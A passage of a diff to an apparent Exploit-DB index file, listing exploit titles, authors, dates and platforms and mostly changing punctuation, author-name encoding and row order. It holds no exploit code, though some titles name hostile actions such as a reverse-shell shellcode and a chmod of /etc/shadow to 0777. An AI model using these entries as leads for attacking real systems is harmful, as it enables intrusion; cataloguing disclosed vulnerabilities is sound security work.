4.1 - Arbitrary Command Execution Vulnerability",2012-09-25,LiquidWorm,php,webapps,0 21200,platforms/linux/remote/21200.c,"Net-SNMP 4.2.3 snmpnetstat Remote Heap Overflow Vulnerability",2002-01-03,"Juan M. de la Torre",linux,remote,0 21201,platforms/windows/remote/21201.pl,"BrowseFTP Client 1.62 - Buffer Overflow Vulnerability",2002-01-04,Kanatoko,windows,remote,0 21202,platforms/linux/dos/21202.txt,"Anti-Web HTTPD 2.2 Script Engine File Opening Denial of Service Vulnerability",2002-01-04,methodic,linux,dos,0 @@ -18473,7 +18505,7 @@ id,file,description,date,author,platform,type,port 21218,platforms/linux/local/21218.sh,"CDRDAO 1.1.x Home Directory Configuration File Symbolic Link Vulnerability (3)",2002-01-13,anonymous,linux,local,0 21219,platforms/linux/local/21219.sh,"CDRDAO 1.1.x Home Directory Configuration File Symbolic Link Vulnerability (4)",2002-01-13,"Karol Wiesek",linux,local,0 21220,platforms/php/webapps/21220.txt,"VICIDIAL Call Center Suite <= 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0 -21221,platforms/php/webapps/21221.txt,"Joomla RokModule Component (index.php, module parameter) Blind SQLi",2012-09-10,Yarolinux,php,webapps,0 +21221,platforms/php/webapps/21221.txt,"Joomla RokModule Component (index.php module parameter) Blind SQLi",2012-09-10,Yarolinux,php,webapps,0 21222,platforms/php/webapps/21222.txt,"SiteGo Remote File Inclusion Vulnerability",2012-09-10,L0n3ly-H34rT,php,webapps,0 21224,platforms/lin_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service Vulnerability",2012-09-10,halfdog,lin_x86-64,dos,0 21225,platforms/windows/remote/21225.c,"John Roy Pi3Web 2.0 For Windows Long Request Buffer Overflow Vulnerability",2002-01-14,aT4r,windows,remote,0 @@ -18503,10 +18535,9 @@ id,file,description,date,author,platform,type,port 21249,platforms/cgi/remote/21249.txt,"Agora.CGI 3/4 Debug Mode Path Disclosure Vulnerability",2002-01-28,superpetz,cgi,remote,0 21250,platforms/php/webapps/21250.txt,"Webify Blog Arbitrary File Deletion Vulnerability",2012-09-11,JIKO,php,webapps,0 21251,platforms/php/webapps/21251.txt,"akcms 4.2.4 - Information Disclosure Vulnerability",2012-09-11,L0n3ly-H34rT,php,webapps,0 -21252,platforms/arm/shellcode/21252.asm,"[Raspberry Pi] Linux/ARM - reverse_shell(tcp,10.1.1.2,0x1337)",2012-09-11,midnitesnake,arm,shellcode,0 -21253,platforms/arm/shellcode/21253.asm,"[Raspberry Pi] Linux/ARM - execve(""/bin/sh"", [0], [0 vars]) - 30 bytes",2012-09-11,midnitesnake,arm,shellcode,0 -21254,platforms/arm/shellcode/21254.asm,"[Raspberry Pi] Linux/ARM - chmod(""/etc/shadow"", 0777) - 41 bytes",2012-09-11,midnitesnake,arm,shellcode,0 -21256,platforms/windows/local/21256.rb,"Winamp MAKI Buffer Overflow",2012-09-12,metasploit,windows,local,0 +21252,platforms/arm/shellcode/21252.asm,"[Raspberry Pi] Linux/ARM - reverse_shell(tcp_10.1.1.2_0x1337)",2012-09-11,midnitesnake,arm,shellcode,0 +21253,platforms/arm/shellcode/21253.asm,"[Raspberry Pi] Linux/ARM - execve(""/bin/sh""_ [0]_ [0 vars]) - 30 bytes",2012-09-11,midnitesnake,arm,shellcode,0 +21254,platforms/arm/shellcode/21254.asm,"[Raspberry Pi] Linux/ARM - chmod(""/etc/shadow""_ 0777) - 41 bytes",2012-09-11,midnitesnake,arm,shellcode,0 21257,platforms/cgi/webapps/21257.txt,"AHG Search Engine 1.0 - Search.CGI Arbitrary Command Execution Vulnerability",2002-01-29,"Aleksey Sintsov",cgi,webapps,0 21258,platforms/linux/local/21258.bat,"Microsoft Windows 2000/NT 4 NTFS File Hiding Vulnerability",2002-01-29,"Hans Somers",linux,local,0 21259,platforms/linux/local/21259.java,"Sun Java Virtual Machine 1.2.2/1.3.1 Segmentation Violation Vulnerability",2002-01-30,"Taeho Oh",linux,local,0 @@ -18539,7 +18570,7 @@ id,file,description,date,author,platform,type,port 21286,platforms/windows/remote/21286.c,"Apple QuickTime 5.0 Content-Type Remote Buffer Overflow Vulnerability",2002-02-08,UNYUN,windows,remote,0 21287,platforms/cgi/remote/21287.pl,"EZNE.NET Ezboard 2000 - Remote Buffer Overflow Vulnerability",2002-02-11,"Jin Ho You",cgi,remote,0 21288,platforms/multiple/local/21288.txt,"Sawmill 6.2.x AdminPassword Insecure Default Permissions Vulnerability",2002-02-11,darky0da,multiple,local,0 -21289,platforms/linux/remote/21289.c,"Ettercap 0.6.3.1 - Large Packet Buffer Overflow Vulnerability",2002-02-14,"Fermín J. Serna",linux,remote,0 +21289,platforms/linux/remote/21289.c,"Ettercap 0.6.3.1 - Large Packet Buffer Overflow Vulnerability",2002-02-14,"Fermín J. Serna",linux,remote,0 21290,platforms/unix/local/21290.sh,"Tarantella Enterprise 3 Symbolic Link Vulnerability",2002-02-19,"Larry W. Cashdollar",unix,local,0 21291,platforms/windows/remote/21291.pl,"phusion webserver 1.0 - Directory Traversal Vulnerability (1)",2002-02-16,"Alex Hernandez",windows,remote,0 21292,platforms/windows/remote/21292.pl,"phusion webserver 1.0 - Directory Traversal Vulnerability (2)",2002-02-16,"Alex Hernandez",windows,remote,0 @@ -18565,11 +18596,11 @@ id,file,description,date,author,platform,type,port 21312,platforms/php/webapps/21312.txt,"ReBB 1.0 Image Tag Cross-Agent Scripting Vulnerability",2002-03-04,skizzik,php,webapps,0 21313,platforms/windows/remote/21313.txt,"Microsoft IIS 4.0/5.0/5.1 - Authentication Method Disclosure Vulnerability",2002-03-05,"David Litchfield",windows,remote,0 21314,platforms/unix/remote/21314.txt,"OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability",2002-03-07,Morgan,unix,remote,0 -21316,platforms/php/webapps/21316.txt,"ASTPP VoIP Billing (4cf207a) Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 21317,platforms/php/webapps/21317.txt,"NeoBill CMS 0.8 Alpha - Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 21318,platforms/windows/local/21318.pl,"Internet Download Manager All Versions - Stack Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 21319,platforms/aix/webapps/21319.txt,"Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF",2012-09-14,modpr0be,aix,webapps,0 21320,platforms/windows/local/21320.pl,"Internet Download Manager All Versions - SEH Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 +22073,platforms/php/webapps/22073.txt,"APBoard 2.0 2 Unauthorized Thread Reading Vulnerability",2002-12-06,"DNA ESC",php,webapps,0 21323,platforms/linux/local/21323.c,"libdbus 'DBUS_SYSTEM_BUS_ADDRESS' Local Privilege Escalation",2012-07-17,"Sebastian Krahmer",linux,local,0 21324,platforms/php/webapps/21324.txt,"luxcal 2.7.0 - Multiple Vulnerabilities",2012-09-17,L0n3ly-H34rT,php,webapps,0 21326,platforms/windows/dos/21326.txt,"Novell Groupwise 8.0.2 HP3 and 2012 Integer Overflow Vulnerability",2012-09-17,"Francis Provencher",windows,dos,0 @@ -18585,12 +18616,12 @@ id,file,description,date,author,platform,type,port 21338,platforms/linux/dos/21338.pl,"XTux Server 2001.0 6.01 Garbage Denial of Service Vulnerability",2002-03-09,b0iler,linux,dos,0 21339,platforms/multiple/remote/21339.c,"Trend Micro InterScan VirusWall 3.5/3.6 Content-Length Scan Bypass Vulnerability",2002-03-11,"Jochen Thomas Bauer",multiple,remote,0 21340,platforms/cgi/remote/21340.pl,"Solaris 7.0/8 Sunsolve CD SSCD_SunCourier.pl CGI Script Arbitrary Command Execution Vulnerability",2002-03-11,Fyodor,cgi,remote,0 -21341,platforms/linux/local/21341.c,"Ecartis 1.0.0,0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (1)",2002-02-27,"the itch",linux,local,0 -21342,platforms/linux/local/21342.c,"Ecartis 1.0.0,0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (2)",2002-02-27,"the itch",linux,local,0 +21341,platforms/linux/local/21341.c,"Ecartis 1.0.0_0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (1)",2002-02-27,"the itch",linux,local,0 +21342,platforms/linux/local/21342.c,"Ecartis 1.0.0_0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (2)",2002-02-27,"the itch",linux,local,0 21343,platforms/php/webapps/21343.txt,"PHProjekt 3.1 - Remote File Include Vulnerability",2002-03-13,b0iler,php,webapps,0 21344,platforms/windows/local/21344.txt,"Microsoft Windows 2000 / NT 4.0 Process Handle Local Privilege Elevation Vulnerability",2002-03-13,EliCZ,windows,local,0 21345,platforms/unix/dos/21345.txt,"Qualcomm QPopper 4.0.x - Remote Denial of Service Vulnerability",2002-03-15,"Jonas Frey",unix,dos,0 -21346,platforms/windows/dos/21346.html,"Microsoft Internet Explorer 5/6,Mozilla 0.8/0.9.x,Opera 5/6 JavaScript Interpreter Denial of Service Vulnerability",2002-03-19,"Patrik Birgersson",windows,dos,0 +21346,platforms/windows/dos/21346.html,"Microsoft Internet Explorer 5/6_Mozilla 0.8/0.9.x_Opera 5/6 JavaScript Interpreter Denial of Service Vulnerability",2002-03-19,"Patrik Birgersson",windows,dos,0 21347,platforms/php/local/21347.php,"PHP 3.0.x/4.x Move_Uploaded_File Open_Basedir Circumvention Vulnerability",2002-03-17,Tozz,php,local,0 21348,platforms/linux/local/21348.txt,"Webmin 0.x Script Code Input Validation Vulnerability",2002-03-20,prophecy,linux,local,0 21349,platforms/php/webapps/21349.txt,"PHP Nuke 5.x Error Message Web Root Disclosure Vulnerability",2002-03-21,godminus,php,webapps,0 @@ -18610,12 +18641,13 @@ id,file,description,date,author,platform,type,port 21363,platforms/unix/remote/21363.c,"Icecast 1.x AVLLib Buffer Overflow Vulnerability",2002-02-16,dizznutt,unix,remote,0 21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x TalkD User Validation Vulnerability",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0 21365,platforms/linux/remote/21365.txt,"PHPGroupWare 0.9.13 Debian Package Configuration Vulnerability",2002-04-03,"Matthias Jordan",linux,remote,0 -21366,platforms/windows/dos/21366.txt,"Microsoft Internet Explorer 5/6,Outlook 2000/2002/5.5,Word 2000/2002 VBScript ActiveX Word Object DoS Vulnerability",2002-04-08,"Elia Florio",windows,dos,0 +21366,platforms/windows/dos/21366.txt,"Microsoft Internet Explorer 5/6_Outlook 2000/2002/5.5_Word 2000/2002 VBScript ActiveX Word Object DoS Vulnerability",2002-04-08,"Elia Florio",windows,dos,0 21367,platforms/windows/remote/21367.txt,"Abyss Web Server 1.0 File Disclosure Vulnerability",2002-04-07,"Jeremy Roberts",windows,remote,0 21368,platforms/windows/remote/21368.c,"Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (1)",2002-04-10,"CHINANSL Security Team",windows,remote,0 21369,platforms/windows/remote/21369.c,"Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (2)",2002-04-14,hsj,windows,remote,0 21370,platforms/windows/remote/21370.c,"Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (3)",2002-04-10,NeMeS||y,windows,remote,0 21371,platforms/windows/remote/21371.c,"Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (4)",2002-04-24,yuange,windows,remote,0 +21419,platforms/windows/dos/21419.txt,"Microsoft Outlook Express 5.5 DoS Device Denial of Service Vulnerability",2002-04-24,ERRor,windows,dos,0 21372,platforms/windows/remote/21372.txt,"Microsoft IIS 4/5 HTTP Error Page Cross-Site Scripting Vulnerability",2002-04-10,"Thor Larholm",windows,remote,0 21373,platforms/openbsd/local/21373.c,"OpenBSD 2.9/3.0 Default Crontab Root Compromise Vulnerability",2002-04-11,"Przemyslaw Frasunek",openbsd,local,0 21374,platforms/cgi/webapps/21374.txt,"IBM Informix Web Datablade 4.1x Page Request SQL Injection Vulnerability",2002-04-11,"Simon Lodal",cgi,webapps,0 @@ -18635,15 +18667,15 @@ id,file,description,date,author,platform,type,port 21388,platforms/windows/dos/21388.c,"Microsoft Windows 2000 Lanman Denial of Service Vulnerability (1)",2002-04-17,"Daniel Nystrom",windows,dos,0 21389,platforms/windows/dos/21389.txt,"Microsoft Windows 2000 Lanman Denial of Service Vulnerability (2)",2003-01-03,ch0wn,windows,dos,0 21390,platforms/cgi/remote/21390.txt,"Sambar Server 5.1 Script Source Disclosure Vulnerability",2002-04-17,pgrundl,cgi,remote,0 -21391,platforms/php/webapps/21391.txt,"PVote 1.0/1.5 Poll Content Manipulation Vulnerability",2002-04-18,"Daniel Nyström",php,webapps,0 +21391,platforms/php/webapps/21391.txt,"PVote 1.0/1.5 Poll Content Manipulation Vulnerability",2002-04-18,"Daniel Nyström",php,webapps,0 21392,platforms/windows/webapps/21392.txt,"Spiceworks 6.0.00993 - Multiple Script Injection Vulnerabilities",2012-09-19,LiquidWorm,windows,webapps,0 21393,platforms/php/webapps/21393.txt,"wordpress wp-topbar 4.02 - Multiple Vulnerabilities",2012-09-19,"Blake Entrekin",php,webapps,0 21394,platforms/windows/webapps/21394.txt,"sonicwall email security 7.3.5 - Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,windows,webapps,0 21395,platforms/hardware/webapps/21395.txt,"Fortigate UTM WAF Appliance Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,hardware,webapps,0 21396,platforms/php/webapps/21396.txt,"torrenttrader 2.08 - Multiple Vulnerabilities",2012-09-19,waraxe,php,webapps,0 -21397,platforms/php/webapps/21397.txt,"PVote 1.0/1.5 Unauthorized Administrative Password Change Vulnerability",2002-04-18,"Daniel Nyström",php,webapps,0 +21397,platforms/php/webapps/21397.txt,"PVote 1.0/1.5 Unauthorized Administrative Password Change Vulnerability",2002-04-18,"Daniel Nyström",php,webapps,0 21398,platforms/linux/local/21398.txt,"SSH2 3.0 Restricted Shell Escaping Command Execution Vulnerability",2002-04-18,A.Dimitrov,linux,local,0 -21399,platforms/php/webapps/21399.txt,"IcrediBB 1.1 Script Injection Vulnerability",2002-04-19,"Daniel Nyström",php,webapps,0 +21399,platforms/php/webapps/21399.txt,"IcrediBB 1.1 Script Injection Vulnerability",2002-04-19,"Daniel Nyström",php,webapps,0 21400,platforms/asp/webapps/21400.txt,"Snitz Forums 2000 3.x Members.ASP SQL Injection Vulnerability",2002-04-19,acemi,asp,webapps,0 21401,platforms/php/webapps/21401.txt,"PostBoard 2.0 BBCode IMG Tag Script Injection Vulnerability",2002-04-19,gcsb,php,webapps,0 21402,platforms/linux/remote/21402.txt,"OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability",2002-04-19,"Marcell Fodor",linux,remote,0 @@ -18651,7 +18683,7 @@ id,file,description,date,author,platform,type,port 21404,platforms/windows/dos/21404.htm,"Microsoft Internet Explorer 5/6 Self-Referential Object Denial of Service Vulnerability",2002-04-20,"Matthew Murphy",windows,dos,0 21405,platforms/cgi/webapps/21405.txt,"Jon Howell Faq-O-Matic 2.7 - Cross-Site Scripting Vulnerability",2002-04-20,BrainRawt,cgi,webapps,0 21406,platforms/cgi/webapps/21406.txt,"Philip Chinery's Guestbook 1.1 Script Injection Vulnerability",2002-04-21,"markus arndt",cgi,webapps,0 -21407,platforms/bsd/local/21407.c,"OS X 10.x, FreeBSD 4.x,OpenBSD 2.x,Solaris 2.5/2.6/7.0/8 exec C Library Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0 +21407,platforms/bsd/local/21407.c,"OS X 10.x_ FreeBSD 4.x_OpenBSD 2.x_Solaris 2.5/2.6/7.0/8 exec C Library Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0 21408,platforms/unix/local/21408.pl,"SLRNPull 0.9.6 Spool Directory Command Line Parameter Buffer Overflow Vulnerability",2002-04-22,zillion,unix,local,0 21409,platforms/unix/dos/21409.pl,"PsyBNC 2.3 Oversized Passwords Denial of Service Vulnerability",2002-04-22,DVDMAN,unix,dos,0 21410,platforms/windows/remote/21410.pl,"Matu FTP 1.74 Client Buffer Overflow Vulnerability",2002-04-23,Kanatoko,windows,remote,0 @@ -18663,7 +18695,6 @@ id,file,description,date,author,platform,type,port 21416,platforms/windows/dos/21416.txt,"Internet Explorer 5/6 Recursive JavaScript Event Denial of Service Vulnerability",2002-04-24,"Berend-Jan Wever",windows,dos,0 21417,platforms/hardware/webapps/21417.py,"Thomson Wireless VoIP Cable Modem Auth Bypass",2012-09-20,"Glafkos Charalambous ",hardware,webapps,0 21418,platforms/php/webapps/21418.txt,"Manhali 1.8 - Local File Inclusion Vulnerability",2012-09-20,L0n3ly-H34rT,php,webapps,0 -21419,platforms/windows/dos/21419.txt,"Microsoft Outlook Express 5.5 DoS Device Denial of Service Vulnerability",2002-04-24,ERRor,windows,dos,0 21420,platforms/linux/local/21420.c,"Sudo 1.6.x Password Prompt Heap Overflow Vulnerability",2001-11-01,MaXX,linux,local,0 21421,platforms/php/webapps/21421.txt,"PHProjekt 2.x/3.x Login Bypass Vulnerability",2002-04-25,"Ulf Harnhammar",php,webapps,0 21422,platforms/linux/remote/21422.txt,"ACME Labs thttpd 2.20 - Cross-Site Scripting Vulnerability",2002-04-25,frog,linux,remote,0 @@ -18674,8 +18705,9 @@ id,file,description,date,author,platform,type,port 21427,platforms/php/webapps/21427.txt,"MiniBB 1.2 - Cross-Site Scripting Vulnerability",2002-04-17,frog,php,webapps,0 21428,platforms/php/webapps/21428.txt,"Messagerie 1.0 - Arbitrary User Removal DoS Vulnerability",2002-04-27,frog,php,webapps,0 21429,platforms/windows/dos/21429.c,"3CDaemon 2.0 - Buffer Overflow Vulnerability (1)",2002-04-15,"MaD SKiLL",windows,dos,0 +22216,platforms/php/webapps/22216.txt,"bitweaver 2.8.1 - Multiple Vulnerabilities",2012-10-24,"Trustwave's SpiderLabs",php,webapps,0 21431,platforms/irix/dos/21431.txt,"IRIX 6.5.x Performance Co-Pilot Remote Denial of Service Vulnerability",2002-04-12,"Marcelo Magnasco",irix,dos,0 -21432,platforms/windows/dos/21432.txt,"BEA Systems WebLogic Server and Express 7.0 - Null Character DoS",2002-04-30,"Peter Gründl",windows,dos,0 +21432,platforms/windows/dos/21432.txt,"BEA Systems WebLogic Server and Express 7.0 - Null Character DoS",2002-04-30,"Peter Gründl",windows,dos,0 21433,platforms/cgi/webapps/21433.txt,"MyGuestbook 1.0 Script Injection Vulnerability",2002-04-30,BrainRawt,cgi,webapps,0 21434,platforms/asp/webapps/21434.txt,"Outfront Spooky 2.x Login SQL Query Manipulation Password Vulnerability",2002-05-02,anonymous,asp,webapps,0 21435,platforms/cgi/webapps/21435.txt,"askSam 4.0 Web Publisher Cross-Site Scripting Vulnerability",2002-05-05,frog,cgi,webapps,0 @@ -18742,6 +18774,7 @@ id,file,description,date,author,platform,type,port 21496,platforms/linux/local/21496.c,"IBM Informix SE 7.25 sqlexec Buffer Overflow Vulnerability (1)",2002-05-30,smurf,linux,local,0 21497,platforms/linux/local/21497.pl,"IBM Informix SE 7.25 sqlexec Buffer Overflow Vulnerability (2)",2002-05-30,pHrail,linux,local,0 21498,platforms/windows/dos/21498.c,"Evolvable Shambala Server 4.5 Web Server Denial of Service Vulnerability",2002-05-31,Shambala,windows,dos,0 +21650,platforms/windows/remote/21650.txt,"Microsoft SQL Server 2000 Database Consistency Checkers Buffer Overflow Vulnerability",2002-07-25,"Cesar Cerrudo",windows,remote,0 21499,platforms/linux/local/21499.txt,"QNX RTOS 4.25 CRTTrap File Disclosure Vulnerability",2002-05-31,"Simon Ouellette",linux,local,0 21500,platforms/linux/local/21500.txt,"QNX RTOS 4.25 monitor Arbitrary File Modification Vulnerability",2002-05-31,"Simon Ouellette",linux,local,0 21501,platforms/linux/local/21501.txt,"QNX RTOS 4.25 dumper Arbitrary File Modification Vulnerability",2002-05-31,"Simon Ouellette",linux,local,0 @@ -18753,7 +18786,7 @@ id,file,description,date,author,platform,type,port 21507,platforms/linux/local/21507.sh,"QNX 6.x - 'ptrace()' Arbitrary Process Modification Vulnerability",2002-06-03,badc0ded,linux,local,0 21508,platforms/windows/dos/21508.py,"SafeNet Sentinel Keys Server Crash PoC",2012-09-24,retset,windows,dos,0 21509,platforms/php/webapps/21509.txt,"Teekai Tracking Online 1.0 - Cross-Site Scripting Vulnerability",2002-06-03,frog,php,webapps,0 -21510,platforms/windows/remote/21510.pl,"Microsoft Internet Explorer 5/6, Microsoft ISA Server 2000, Microsoft Proxy Server 2.0 Gopher Client - Buffer Overflow",2002-07-27,mat@monkey.org,windows,remote,0 +21510,platforms/windows/remote/21510.pl,"Microsoft Internet Explorer 5/6_ Microsoft ISA Server 2000_ Microsoft Proxy Server 2.0 Gopher Client - Buffer Overflow",2002-07-27,mat@monkey.org,windows,remote,0 21511,platforms/multiple/remote/21511.c,"Nullsoft SHOUTCast 1.8.9 - Remote Buffer Overflow Vulnerability",2002-06-04,eSDee,multiple,remote,0 21512,platforms/freebsd/dos/21512.txt,"Slurp 1.10 SysLog Remote Format String Vulnerability",2002-06-04,zillion,freebsd,dos,0 21513,platforms/hardware/remote/21513.c,"Telindus 1100 Series Router Administration Password Leak Vulnerability",2002-06-05,rubik,hardware,remote,0 @@ -18764,7 +18797,6 @@ id,file,description,date,author,platform,type,port 21518,platforms/linux/dos/21518.txt,"X Window 4.0/4.1/4.2 System Oversized Font DoS",2002-06-10,"Tom Vogt",linux,dos,0 21519,platforms/php/webapps/21519.txt,"MyHelpDesk 20020509 HTML Injection Vulnerability",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21520,platforms/linux/remote/21520.py,"QNX <= 6.5.0 / QCONN <= 1.4.207944 - Remote Command Execution Vulnerability",2012-09-25,Mor!p3r,linux,remote,0 -21521,platforms/php/webapps/21521.txt,"ViArt Shop Enterprise 4.1 - Arbitrary Command Execution Vulnerability",2012-09-25,LiquidWorm,php,webapps,0 21523,platforms/hardware/dos/21523.txt,"Cisco DPC2100 - Denial of Service",2012-09-26,"Daniel Smith",hardware,dos,0 21524,platforms/php/webapps/21524.txt,"ViArt Shop Evaluation 4.1 - Multiple Remote File Inclusion Vulnerabilities",2012-09-26,L0n3ly-H34rT,php,webapps,0 21525,platforms/php/webapps/21525.txt,"Geeklog 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 @@ -18781,7 +18813,7 @@ id,file,description,date,author,platform,type,port 21536,platforms/windows/dos/21536.jsp,"Macromedia JRun 3/4 JSP Engine Denial of Service Vulnerability",2002-06-12,"Marc Schoenefeld",windows,dos,0 21537,platforms/linux/dos/21537.c,"Ayman Akt IRCIT 0.3.1 Invite Message Remote Buffer Overflow Vulnerability",2002-06-12,gobbles,linux,dos,0 21538,platforms/linux/local/21538.c,"Richard Gooch SimpleInit 2.0.2 Open File Descriptor Vulnerability",2002-06-12,"Patrick Smith",linux,local,0 -21539,platforms/multiple/dos/21539.c,"Netscape 4.x/6.x,Mozilla 0.9.x Malformed Email POP3 - Denial of Service Vulnerability",2002-06-12,eldre8,multiple,dos,0 +21539,platforms/multiple/dos/21539.c,"Netscape 4.x/6.x_Mozilla 0.9.x Malformed Email POP3 - Denial of Service Vulnerability",2002-06-12,eldre8,multiple,dos,0 21540,platforms/windows/dos/21540.txt,"Microsoft SQL Server 2000 SQLXML Buffer Overflow Vulnerability",2002-06-12,"Matt Moore",windows,dos,0 21541,platforms/windows/remote/21541.txt,"Microsoft SQL Server 2000 SQLXML Script Injection Vulnerability",2002-06-12,"Matt Moore",windows,remote,0 21542,platforms/windows/remote/21542.c,"AnalogX SimpleServer:WWW 1.16 Web Server Buffer Overflow Vulnerability",2002-06-13,"Auriemma Luigi",windows,remote,0 @@ -18811,7 +18843,7 @@ id,file,description,date,author,platform,type,port 21566,platforms/unix/local/21566.c,"Interbase 6.0 GDS_Drop Interbase Environment Variable Buffer Overflow (2)",2002-06-18,bob,unix,local,0 21567,platforms/cgi/webapps/21567.pl,"WebScripts WebBBS 4.x/5.0 - Remote Command Execution Vulnerability",2002-06-06,"NERF Security",cgi,webapps,0 21568,platforms/linux/local/21568.c,"Cisco VPN Client for Unix 3.5.1 - Local Buffer Overflow Vulnerability",2002-06-19,methodic,linux,local,0 -21569,platforms/windows/dos/21569.txt,"Microsoft SQL Server 2000,Microsoft Jet 4.0 Engine Unicode Buffer Overflow Vulnerability",2002-06-19,NGSSoftware,windows,dos,0 +21569,platforms/windows/dos/21569.txt,"Microsoft SQL Server 2000_Microsoft Jet 4.0 Engine Unicode Buffer Overflow Vulnerability",2002-06-19,NGSSoftware,windows,dos,0 21570,platforms/php/webapps/21570.txt,"BasiliX Webmail 1.1 Message Content Script Injection Vulnerability",2002-06-19,"Ulf Harnhammar",php,webapps,0 21571,platforms/irix/remote/21571.c,"SGI IRIX 6.x rpc.xfsmd Remote Command Execution Vulnerability",2002-06-20,"Last Stage of Delirium",irix,remote,0 21572,platforms/multiple/dos/21572.txt,"Half-Life Server 1.1/3.1 New Player Flood Denial of Service Vulnerability",2002-06-20,"Auriemma Luigi",multiple,dos,0 @@ -18825,9 +18857,9 @@ id,file,description,date,author,platform,type,port 21580,platforms/linux/dos/21580.txt,"Inktomi Traffic Server 4/5 Traffic_Manager Path Argument Buffer Overflow",2002-06-25,"Juliano Rizzo",linux,dos,0 21581,platforms/windows/remote/21581.txt,"Summit Computer Networks Lil' HTTP Server 2 URLCount.CGI HTML Injection Vulnerability",2002-06-27,"Matthew Murphy",windows,remote,0 21582,platforms/windows/remote/21582.txt,"Macromedia JRun 3/4 Administrative Authentication Bypass Vulnerability",2002-06-28,"Matt Moore",windows,remote,0 -21583,platforms/linux/local/21583.pl,"Mandrake 7/8/9,RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (1)",2002-06-29,clorox,linux,local,0 -21584,platforms/linux/local/21584.pl,"Mandrake 7/8/9,RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (2)",2002-06-29,"andrea lisci",linux,local,0 -21585,platforms/linux/local/21585.c,"Mandrake 7/8/9,RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (3)",2002-06-29,N4rK07IX,linux,local,0 +21583,platforms/linux/local/21583.pl,"Mandrake 7/8/9_RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (1)",2002-06-29,clorox,linux,local,0 +21584,platforms/linux/local/21584.pl,"Mandrake 7/8/9_RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (2)",2002-06-29,"andrea lisci",linux,local,0 +21585,platforms/linux/local/21585.c,"Mandrake 7/8/9_RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (3)",2002-06-29,N4rK07IX,linux,local,0 21586,platforms/linux/remote/21586.txt,"E-Guest 1.1 Server Side Include Arbitrary Command Execution Vulnerability",2002-06-30,DownBload,linux,remote,0 21587,platforms/cgi/webapps/21587.txt,"BBC Education Betsie 1.5 Parserl.PL Cross-Site Scripting Vulnerability",2002-07-01,"Mark Rowe",cgi,webapps,0 21588,platforms/cgi/webapps/21588.txt,"Blackboard 5.0 - Cross-Site Scripting Vulnerability",2002-07-01,"Berend-Jan Wever",cgi,webapps,0 @@ -18863,12 +18895,13 @@ id,file,description,date,author,platform,type,port 21618,platforms/windows/remote/21618.txt,"Mirabilis ICQ 2002 Sound Scheme Remote Configuration Modification Vulnerability",2002-07-15,xLaNT,windows,remote,0 21619,platforms/windows/remote/21619.txt,"AOL Instant Messenger 4.x Unauthorized Actions Vulnerability",2002-07-16,orb,windows,remote,0 21620,platforms/cgi/dos/21620.txt,"Oddsock Song Requester 2.1 WinAmp Plugin Denial of Service Vulnerability",2002-07-16,"Lucas Lundgren",cgi,dos,0 -21621,platforms/jsp/webapps/21621.txt,"Macromedia Sitespring 1.2 Default Error Page Cross-Site Scripting Vulnerability",2002-07-17,"Peter Gründl",jsp,webapps,0 +21621,platforms/jsp/webapps/21621.txt,"Macromedia Sitespring 1.2 Default Error Page Cross-Site Scripting Vulnerability",2002-07-17,"Peter Gründl",jsp,webapps,0 21622,platforms/php/webapps/21622.txt,"PHP-Wiki 1.2/1.3 - Cross-Site Scripting Vulnerability",2002-07-17,Pistone,php,webapps,0 21623,platforms/linux/local/21623.txt,"Python 1.5.2 Pickle Unsafe eval() Code Execution Vulnerability",2002-07-17,"Jeff Epler",linux,local,0 21624,platforms/linux/local/21624.py,"Python 1.5/1.6/2.0/2.1.x Pickle Class Constructor Arbitrary Code Execution",2002-07-17,"Jeff Epler",linux,local,0 21625,platforms/windows/remote/21625.pl,"Trend Micro InterScan VirusWall for Windows NT 3.52 Space Gap Scan Bypass",2002-07-18,SecuriTeam,windows,remote,0 21626,platforms/windows/remote/21626.c,"3.3/4.0/4.2 MERCUR Mailserver Control-Service Buffer Overflow",2002-07-16,anonymous,windows,remote,0 +22072,platforms/linux/remote/22072.c,"Cobalt RaQ4 Administrative Interface Command Execution Vulnerability",2002-12-05,grazer,linux,remote,0 21627,platforms/multiple/remote/21627.txt,"Oracle Reports Server 6.0.8/9.0.2 Information Disclosure Vulnerability",2002-07-18,skp,multiple,remote,0 21628,platforms/php/webapps/21628.txt,"Geeklog 1.3.5 HTML Attribute Cross-Site Scripting Vulnerability",2002-07-19,"Ulf Harnhammar",php,webapps,0 21629,platforms/windows/local/21629.txt,"Adobe eBook Reader 2.2 File Restoration Privilege Escalation Vulnerability",2002-07-19,"Vladimir Katalov",windows,local,0 @@ -18878,7 +18911,7 @@ 